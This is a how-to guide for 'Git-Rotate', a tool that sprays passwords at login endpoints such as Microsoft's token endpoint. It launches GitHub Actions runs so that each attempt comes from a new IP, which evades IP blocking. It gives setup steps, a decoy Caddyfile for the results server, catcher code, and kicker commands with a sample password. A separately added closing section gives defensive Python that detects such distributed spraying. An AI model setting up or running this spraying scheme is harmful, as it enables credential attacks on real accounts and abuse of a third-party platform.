
Git-Rotate - Automating IP Rotation via GitHub Actions for Security Testing
This guide explains how to use GitHub Actions for IP rotation in a proof-of-concept project called Git-Rotate. The project is designed for scenarios like password spraying or brute-forcing login endpoints while avoiding IP-based blocking.
It consists of three main components: the Kicker, the Sprayer, and the Catcher. Below, we will walk you through each component and provide step-by-step instructions to set up and use this system.
Important Note: Misusing GitHub Actions for abusive purposes violates GitHub's terms of service. This guide is for educational purposes only. You are responsible for adhering to all applicable laws and rules.
Overview of Components
1. Kicker
The Kicker is a Python script that creates and populates workflow runs in GitHub Actions. It passes sensitive information (e.g., target URL, username, password, and Catcher IP address) to the workflow using GitHub secrets.
2. Sprayer
The Sprayer is a Python script executed by a GitHub Actions workflow run. It sends login requests to the target endpoint with username-password combinations and forwards the responses to the Catcher. Each workflow run uses a unique IP address, leveraging GitHub's distributed infrastructure.
3. Catcher
The Catcher is a Python Flask web server that processes login responses from the Sprayer. It determines whether login attempts succeed or fail and logs the results. A reverse proxy like Caddy is used to secure communication between components via TLS.
Setting Up Each Component
1. Setting Up the Sprayer
1. Create a new GitHub repository.
2. Add the following files:
sprayer
├── .github
│   └── workflows
│       └── sprayer.yml
├── requirements.txt
└── sprayer.py
3. The sprayer.yml workflow file should be configured to trigger on the workflow_dispatch event, allowing it to be manually triggered via the REST API.
4. Ensure your sprayer.py script sends login requests to your target endpoint (e.g., https://login.microsoft.com/common/oauth2/token) and forwards responses to the Catcher.
2. Setting Up the Catcher
The Catcher processes responses from the Sprayer and logs results.
With TLS (Recommended)
1. Use Caddy as a reverse proxy for secure HTTPS communication.
2. Create a Caddyfile with the following configuration (update domain name, path, and port as needed):
example.com {
    header {
        -Server
    }
    @notWowAmazing {
        not path /wow-amazing
    }
    handle @notWowAmazing {
        respond "Not Found" 404
    }
    handle {
        reverse_proxy localhost:5000
    }
}
3. Update your catcher.py script:
# The route path must match the path the Caddyfile forwards (/wow-amazing)
@app.route("/wow-amazing", methods=["POST"])
def handle_post_data():
    data = request.get_json()
    username = data.get("username")
    # Process data here...
4. Start the Flask web app:
python3 catcher.py
Without TLS (Not Recommended)
1. Bind the Flask app to all interfaces:
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)
2. Start the Flask web app:
python3 catcher.py
3. Setting Up the Kicker
The Kicker creates workflow runs in your GitHub repository.
1. Ensure you have a fine-grained GitHub access token with these permissions:
- Actions: Read & Write
- Secrets: Read & Write
2. Update your config.ini file with your GitHub account details:
[GitHub]
owner = <your-username>
repo = <your-repo-name>
token = <fine-grained-access-token>
3. Install dependencies for kicker.py
4. Run the Kicker script with appropriate arguments:
If using HTTPS:
python3 kicker.py -u user-list.txt -p "Password123" -c https://example.com/wow-amazing -s
If using HTTP:
python3 kicker.py -u user-list.txt -p "Password123" -c http://example.com/wow-amazing
Demo
Once all components are set up:
- Use the Kicker to trigger workflow runs in your repository.
- The Sprayer will send login requests from unique IPs.
- The Catcher will log responses securely.
This modular setup can be extended or modified for other targets or workflows as needed. You can learn more and download Git-Rotate on GitHub.
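Detection note, added here as an example and not part of Git-Rotate or the original article: because each workflow run arrives from a different IP, a per-IP failure counter sees only one attempt per address, so this example instead groups failed logins from CI-runner address ranges by time window and alerts on many users across many IPs. The log record layout, thresholds, function names and CIDR ranges (RFC 5737 documentation networks) are assumptions.

```python
from collections import Counter
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Assumption: placeholder CIDRs. In production, load the ranges GitHub publishes
# for Actions runners (the "actions" list at https://api.github.com/meta).
RUNNER_RANGES = [ip_network("198.51.100.0/24"), ip_network("203.0.113.0/24")]

SAMPLE_EVENTS = [  # constructed sign-in records: (timestamp, user, src_ip, outcome)
    ("2024-05-01T09:00:05", "alice", "198.51.100.7", "failure"),
    ("2024-05-01T09:00:41", "bob", "203.0.113.19", "failure"),
    ("2024-05-01T09:01:10", "carol", "198.51.100.88", "failure"),
    ("2024-05-01T09:01:52", "dave", "203.0.113.4", "failure"),
    ("2024-05-01T09:02:30", "erin", "198.51.100.201", "failure"),
    ("2024-05-01T09:03:00", "frank", "192.0.2.10", "failure"),    # not a runner IP
    ("2024-05-01T09:03:20", "frank", "192.0.2.10", "success"),
    ("2024-05-01T14:00:00", "alice", "203.0.113.50", "failure"),  # isolated failure
]

def max_failures_per_ip(events):
    """Highest failure count any single IP reaches (what a per-IP lockout sees)."""
    counts = Counter(ip for _, _, ip, outcome in events if outcome == "failure")
    return max(counts.values(), default=0)

def from_runner(ip):
    addr = ip_address(ip)
    return any(addr in net for net in RUNNER_RANGES)

def find_distributed_spray(events, window=timedelta(minutes=10), min_users=4, min_ips=4):
    """Alert on bursts of failures from runner ranges spanning many users and IPs."""
    failures = sorted((datetime.fromisoformat(ts), user, ip)
                      for ts, user, ip, outcome in events
                      if outcome == "failure" and from_runner(ip))
    alerts, i = [], 0
    while i < len(failures):
        j = i  # extend j to cover every failure within `window` of failure i
        while j < len(failures) and failures[j][0] - failures[i][0] <= window:
            j += 1
        burst = failures[i:j]
        users = {u for _, u, _ in burst}
        ips = {ip for _, _, ip in burst}
        if len(users) >= min_users and len(ips) >= min_ips:
            alerts.append({"start": burst[0][0], "end": burst[-1][0],
                           "users": sorted(users), "ips": sorted(ips)})
            i = j  # skip past the reported burst
        else:
            i += 1
    return alerts

if __name__ == "__main__":
    print("max failures from one IP:", max_failures_per_ip(SAMPLE_EVENTS))
    print(find_distributed_spray(SAMPLE_EVENTS))
```

On the sample data no single address exceeds one failure, yet the grouped view reports one burst covering five accounts from five runner addresses.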